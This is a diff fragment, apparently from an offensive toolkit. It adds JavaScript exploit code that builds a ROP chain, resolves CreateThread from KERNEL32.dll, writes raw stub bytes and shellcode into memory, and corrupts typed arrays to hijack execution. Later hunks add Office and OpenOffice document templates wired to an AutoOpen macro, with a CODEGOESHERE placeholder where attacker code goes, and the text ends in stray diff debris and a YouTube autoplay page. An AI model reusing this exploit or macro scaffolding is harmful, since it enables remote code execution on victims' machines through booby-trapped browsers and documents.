+var backupESP = rop.findSequence(Array(0x89, 0x01, 0xc3))
+var ropChain = new Uint32Array(ropArrBuf)
+ropChain[0] = backupESP;
+CreateThread = rop.pe.resolve_imported_function('KERNEL32.dll', 'CreateThread')
+
+ropChain[0x12c >> 2] = ropChain[0x130 >> 2];
+
+for (var i = 0; i < ropChain.length; i++)
+{
+  if (ropChain[i] == 0xcccccccc)
+    break;
+}
+
+ropChain[i++] = 0xc4819090;
+ropChain[i++] = 0x00000800;
+ropChain[i++] = 0x5050c031;
+ropChain[i++] = 0x5b21eb50;
+ropChain[i++] = 0xb8505053;
+ropChain[i++] = CreateThread;
+ropChain[i++] = 0xb890d0ff;
+ropChain[i++] = arrBase + 0x2040;
+ropChain[i++] = 0x5f58208b;
+ropChain[i++] = 0xbe905d58;
+ropChain[i++] = 0xFFFFFF00;
+ropChain[i++] = 0x000cc2c9;
+ropChain[i++] = 0xffffdae8;
+ropChain[i++] = 0x909090ff;
+
+for (var j = 0; j < Shellcode.length; j += 2)
+  ropChain[i++] = Shellcode.charCodeAt(j) + Shellcode.charCodeAt(j + 1) * 0x10000;
+
+mArray[0x400] = qwArray[0x400] = qword2Double(arrBase + 0x2000, 0)
+mArray[0x400 + (0x10 >> 3)] = qwArray[0x400 + (0x10 >> 3)] = qword2Double(0, arrBase + 0x2040)
+mArray[0x400 + (0x18 >> 3)] = qwArray[0x400 + (0x18 >> 3)] = qword2Double(4, 0)
+mArray[0x400 + (0x40 >> 3)] = qwArray[0x400 + (0x40 >> 3)] = qword2Double(ropBase, 0)
+mArray[0x400 + (0xac >> 3)] = qwArray[0x400 + (0xac >> 3)] = qword2Double(0, 2)
+
+for (var i = 0; i < 4; i++) {
+  container[0x400 + i] = 0xdea110c8
+}
+
+qwArray[0x21e] = mArray[0x21e] = qword2Double(0xdea110c8, 0)
+qwArray[0x2fe] = mArray[0x2fe] = qword2Double(2, 0)
+qwArray[0x2b3] = mArray[0x2b3] = qword2Double(0, 3)
+qwArray[0x2a9] = mArray[0x2a9] = qword2Double(0, 2)
+
+postMessage("!")
@@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+  <dc:title/>
+  <dc:subject/>
+  <dc:creator/>
+  <cp:keywords/>
+  <dc:description></dc:description>
+  <cp:lastModifiedBy>Nobody</cp:lastModifiedBy>
+  <cp:revision>1</cp:revision>
+  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
+  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
+  <cp:category/>
+</cp:coreProperties>
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
+<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">REM  *****  BASIC  *****
+
+CODEGOESHERE
+</script:module>
@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE library:library PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "library.dtd">
+<library:library xmlns:library="http://openoffice.org/2000/library" library:name="Standard" library:readonly="false" library:passwordprotected="false">
+ <library:element library:name="Module1"/>
+</library:library>
@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE library:libraries PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "libraries.dtd">
+<library:libraries xmlns:library="http://openoffice.org/2000/library" xmlns:xlink="http://www.w3.org/1999/xlink">
+ <library:library library:name="Standard" library:link="false"/>
+</library:libraries>
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .3.3
 .4.1
				`@@ -0,0 +1 @@`
				`<html><body bgcolor="#2F3236"><center><div><iframe width="1280" height="720" src="https://www.youtube.com/embed/wArxEk0Rxhc?autoplay=1" frameborder="0" allowfullscreen></iframe></div></center></body></html>`